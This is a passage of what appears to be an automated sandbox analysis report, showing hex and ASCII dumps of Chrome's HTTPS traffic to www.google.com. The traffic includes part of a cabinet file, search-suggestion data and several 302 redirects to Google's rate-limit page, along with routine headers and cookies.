                                                                                            2024-04-29 09:36:22 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                                                                                            Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                                                                            2024-04-29 09:36:22 UTC9633INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                                                                            Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.849714142.250.191.1964436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-04-29 09:36:37 UTC603OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                            Host: www.google.com
                                                                                            Connection: keep-alive
                                                                                            X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIkqHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==
                                                                                            Sec-Fetch-Site: none
                                                                                            Sec-Fetch-Mode: no-cors
                                                                                            Sec-Fetch-Dest: empty
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            2024-04-29 09:36:37 UTC1703INHTTP/1.1 200 OK
                                                                                            Date: Mon, 29 Apr 2024 09:36:37 GMT
                                                                                            Pragma: no-cache
                                                                                            Expires: -1
                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                            Content-Type: text/javascript; charset=UTF-8
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-Id_C6lHRYbkopkn_PY9S7A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                            Permissions-Policy: unload=()
                                                                                            Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                            Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                            Server: gws
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Accept-Ranges: none
                                                                                            Vary: Accept-Encoding
                                                                                            Connection: close
                                                                                            Transfer-Encoding: chunked
                                                                                            2024-04-29 09:36:37 UTC1703INData Raw: 38 61 63 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 6d 61 6e 6f 72 20 6c 6f 72 64 73 20 67 61 6d 65 22 2c 22 77 6f 6d 61 6e 20 64 65 66 72 61 75 64 65 64 20 70 6f 73 74 61 6c 20 73 65 72 76 69 63 65 22 2c 22 73 6f 75 74 68 77 65 73 74 20 61 69 72 6c 69 6e 65 73 20 66 6c 69 67 68 74 73 22 2c 22 6e 66 6c 20 64 72 61 66 74 20 75 6e 64 72 61 66 74 65 64 20 66 72 65 65 20 61 67 65 6e 74 20 73 69 67 6e 69 6e 67 73 22 2c 22 73 74 61 72 64 65 77 20 76 61 6c 6c 65 79 20 31 2e 36 20 63 6f 6e 73 6f 6c 65 20 75 70 64 61 74 65 22 2c 22 73 70 61 63 65 78 20 66 61 6c 63 6f 6e 20 39 20 72 6f 63 6b 65 74 20 6c 61 75 6e 63 68 22 2c 22 62 72 61 6e 63 68 69 6e 67 20 6f 75 74 20 68 61 6c 6c 6d 61 72 6b 20 6d 6f 76 69 65 20 63 61 73 74 22 2c 22 6e 79 74 20 73 74 72 61 6e 64 73 20
                                                                                            Data Ascii: 8ac)]}'["",["manor lords game","woman defrauded postal service","southwest airlines flights","nfl draft undrafted free agent signings","stardew valley 1.6 console update","spacex falcon 9 rocket launch","branching out hallmark movie cast","nyt strands
                                                                                            2024-04-29 09:36:37 UTC524INData Raw: 6f 35 64 46 70 5a 62 46 45 30 56 47 52 48 4e 6c 52 4c 4d 6b 31 71 53 56 42 5a 4f 58 56 6c 5a 6a 51 77 57 55 6f 31 53 58 6c 71 61 6b 38 35 52 7a 52 72 52 55 38 77 52 57 34 79 53 6a 64 75 4e 44 41 76 5a 6a 68 42 4d 47 5a 71 61 55 64 30 62 55 46 32 4d 32 74 36 4e 54 63 32 4f 45 5a 4b 61 6a 49 78 62 54 6c 43 4e 6d 78 79 59 55 4a 30 4d 47 70 7a 64 32 73 79 65 44 68 75 63 30 4a 75 53 47 49 33 62 6d 70 57 63 33 5a 79 54 6c 46 35 61 57 52 77 62 48 6c 6a 57 6b 4a 4b 52 32 5a 4a 4d 57 5a 51 62 58 6b 78 4e 30 39 6c 63 33 49 35 52 47 34 72 52 33 67 31 52 32 64 79 4f 56 68 77 57 6d 4a 49 56 7a 4e 44 56 58 4a 30 63 44 52 70 4e 6d 68 31 65 6b 34 79 56 57 5a 4b 64 31 42 75 55 33 52 56 5a 58 4d 30 52 54 4e 69 53 6e 46 6f 61 58 5a 4b 52 7a 68 45 56 6b 51 32 63 6e 5a 56 4f
                                                                                            Data Ascii: o5dFpZbFE0VGRHNlRLMk1qSVBZOXVlZjQwWUo1SXlqak85RzRrRU8wRW4ySjduNDAvZjhBMGZqaUd0bUF2M2t6NTc2OEZKajIxbTlCNmxyYUJ0MGpzd2syeDhuc0JuSGI3bmpWc3ZyTlF5aWRwbHljWkJKR2ZJMWZQbXkxN09lc3I5RG4rR3g1R2dyOVhwWmJIVzNDVXJ0cDRpNmh1ek4yVWZKd1BuU3RVZXM0RTNiSnFoaXZKRzhEVkQ2cnZVO
                                                                                            2024-04-29 09:36:37 UTC1255INData Raw: 36 33 34 0d 0a 52 56 6b 77 64 54 49 72 5a 58 5a 74 61 6b 31 72 56 55 6f 32 59 30 4d 30 61 33 46 48 65 6e 4e 53 55 32 5a 4b 4e 32 56 4f 52 31 42 59 63 54 68 54 55 6c 5a 54 55 31 4a 7a 4b 31 52 47 56 55 4e 4f 62 47 4a 43 65 6e 52 50 55 44 68 42 63 30 31 6e 61 6e 70 79 54 6e 42 68 59 6d 70 52 55 54 51 32 5a 47 4a 4b 59 30 52 4f 56 56 56 35 65 6c 4a 69 63 33 5a 44 63 33 46 78 51 30 52 72 57 54 63 32 64 48 52 7a 59 6e 68 4f 52 69 74 46 57 6c 5a 69 53 6b 74 70 56 45 74 75 4f 57 31 36 62 6a 51 78 56 44 46 44 57 45 39 73 54 31 70 4b 62 44 4e 42 5a 32 52 50 55 6c 4e 79 62 6c 42 69 5a 79 73 72 62 30 70 78 4e 6e 4a 77 62 6d 46 4c 63 32 6c 75 61 57 74 4c 5a 7a 64 48 61 45 39 54 55 44 42 43 65 44 55 77 64 6c 68 72 5a 6b 6c 70 54 6b 5a 78 59 56 4e 32 4e 6e 56 5a 53 31
                                                                                            Data Ascii: 634RVkwdTIrZXZtak1rVUo2Y0M0a3FHenNSU2ZKN2VOR1BYcThTUlZTU1JzK1RGVUNObGJCenRPUDhBc01nanpyTnBhYmpRUTQ2ZGJKY0ROVVV5elJic3ZDc3FxQ0RrWTc2dHRzYnhORitFWlZiSktpVEtuOW16bjQxVDFDWE9sT1pKbDNBZ2RPUlNyblBiZysrb0pxNnJwbmFLc2luaWtLZzdHaE9TUDBCeDUwdlhrZklpTkZxYVN2NnVZS1
                                                                                            2024-04-29 09:36:37 UTC340INData Raw: 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 72 65 6c 65 76 61 6e 63 65 22 3a 5b 31 32 35 37 2c 31 32 35 36 2c 31 32 35 35 2c 31 32 35 34 2c 31 32 35 33 2c 31 32 35 32 2c 31 32 35 31 2c 31 32 35 30 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 73 75 62 74 79 70 65 73 22 3a 5b 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 5d 2c 22 67 6f 6f 67 6c
                                                                                            Data Ascii: 002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"googl
                                                                                            2024-04-29 09:36:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            3192.168.2.849712142.250.191.1964436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-04-29 09:36:37 UTC353OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                            Host: www.google.com
                                                                                            Connection: keep-alive
                                                                                            Sec-Fetch-Site: none
                                                                                            Sec-Fetch-Mode: no-cors
                                                                                            Sec-Fetch-Dest: empty
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            2024-04-29 09:36:38 UTC1815INHTTP/1.1 302 Found
                                                                                            Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgRRtT5aGKXUvbEGIjA238wcEXL0ZhP0SC2ZjrB5AGUw8VRCsMRrDZYQqy4aVGG5bDynshITRamrktaGYZMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                            x-hallmonitor-challenge: CgsIptS9sQYQp-KtXxIEUbU-Wg
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                            Permissions-Policy: unload=()
                                                                                            Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                            Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                            Date: Mon, 29 Apr 2024 09:36:38 GMT
                                                                                            Server: gws
                                                                                            Content-Length: 427
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            Set-Cookie: 1P_JAR=2024-04-29-09; expires=Wed, 29-May-2024 09:36:38 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                            Set-Cookie: NID=513=iKF3zgbguxLbgN994wCPViP6UbiAAtMj4u72SFJOZR2j2hkJpxBANvBa9O5o9I3707thiGIhpr9YMpoChjPyChWsEE8GusGsh-1BweTJZbwCNT8MRI29hSZynpU0B6cVrbjhyvvRt-DcmFpEWy8yvWiHRan43jkneKAQzhihk1o; expires=Tue, 29-Oct-2024 09:36:37 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close
                                                                                            2024-04-29 09:36:38 UTC427INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 64 64 6c 6a 73 6f 6e 25 33 46 61 73 79 6e
                                                                                            Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasyn


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            4192.168.2.849713142.250.191.1964436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-04-29 09:36:37 UTC506OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                            Host: www.google.com
                                                                                            Connection: keep-alive
                                                                                            X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIkqHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==
                                                                                            Sec-Fetch-Site: cross-site
                                                                                            Sec-Fetch-Mode: no-cors
                                                                                            Sec-Fetch-Dest: empty
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            2024-04-29 09:36:38 UTC1842INHTTP/1.1 302 Found
                                                                                            Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRRtT5aGKXUvbEGIjDdp0aB_5C1gr2eixUtAMj4mBUQzkJ9vh0Q2d77njF6aqNILXZ84lvrwl1-Gwx1dfsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                            x-hallmonitor-challenge: CgsIptS9sQYQhNrQdxIEUbU-Wg
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                            Permissions-Policy: unload=()
                                                                                            Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                            Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                            Date: Mon, 29 Apr 2024 09:36:38 GMT
                                                                                            Server: gws
                                                                                            Content-Length: 458
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            Set-Cookie: 1P_JAR=2024-04-29-09; expires=Wed, 29-May-2024 09:36:38 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                            Set-Cookie: NID=513=i4vGxEho67hIbT78H4sdvR3RiGAbuswNQATGLpxg1ZwbZWfPfJEEpO9gKebEs9GpjkyVn_LdpJxbX71dSG1YWSxKprI50Iw_R0SzrRyArmtuuOy3FX2os12m5mg3IOH4454YlQzymsc0wKOKj9gGLzAcNZLcSnF8tYSI_CuAr-Y; expires=Tue, 29-Oct-2024 09:36:37 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close
                                                                                            2024-04-29 09:36:38 UTC458INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 25 33 46 68
                                                                                            Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            5192.168.2.849715142.250.191.1964436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-04-29 09:36:37 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                            Host: www.google.com
                                                                                            Connection: keep-alive
                                                                                            Sec-Fetch-Site: cross-site
                                                                                            Sec-Fetch-Mode: no-cors
                                                                                            Sec-Fetch-Dest: empty
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            2024-04-29 09:36:38 UTC1760INHTTP/1.1 302 Found
                                                                                            Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRRtT5aGKXUvbEGIjD-kgWdpW8hT-9hc2nj_b9H1bs6sOSvG1viHx2oR-H037B_HudVAHyts9ARK3nBSXsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                            x-hallmonitor-challenge: CgsIptS9sQYQp-PGURIEUbU-Wg
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                            Permissions-Policy: unload=()
                                                                                            Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                            Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                            Date: Mon, 29 Apr 2024 09:36:38 GMT
                                                                                            Server: gws
                                                                                            Content-Length: 417
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            Set-Cookie: 1P_JAR=2024-04-29-09; expires=Wed, 29-May-2024 09:36:38 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                            Set-Cookie: NID=513=eegqcU8czylrZKezFcMw6KWL6vQwBujDj2ABLhpOoBb0lWAOvzeNu969cSPHJ7hNTM2x-P6AvBxYP9yREpeyIKCw7DXLk8T0qojTieH2VISxt8Mvxyl6rytQbK8lFHQkUxvetMEGrzxPSMPA_Yc2K8PvEto5bk8KHhZPZ0MIs6c; expires=Tue, 29-Oct-2024 09:36:37 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close
                                                                                            2024-04-29 09:36:38 UTC417INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 26
                                                                                            Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            6192.168.2.849720142.250.191.1964436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-04-29 09:36:38 UTC738OUTGET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRRtT5aGKXUvbEGIjD-kgWdpW8hT-9hc2nj_b9H1bs6sOSvG1viHx2oR-H037B_HudVAHyts9ARK3nBSXsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                                            Host: www.google.com
                                                                                            Connection: keep-alive
                                                                                            Sec-Fetch-Site: cross-site
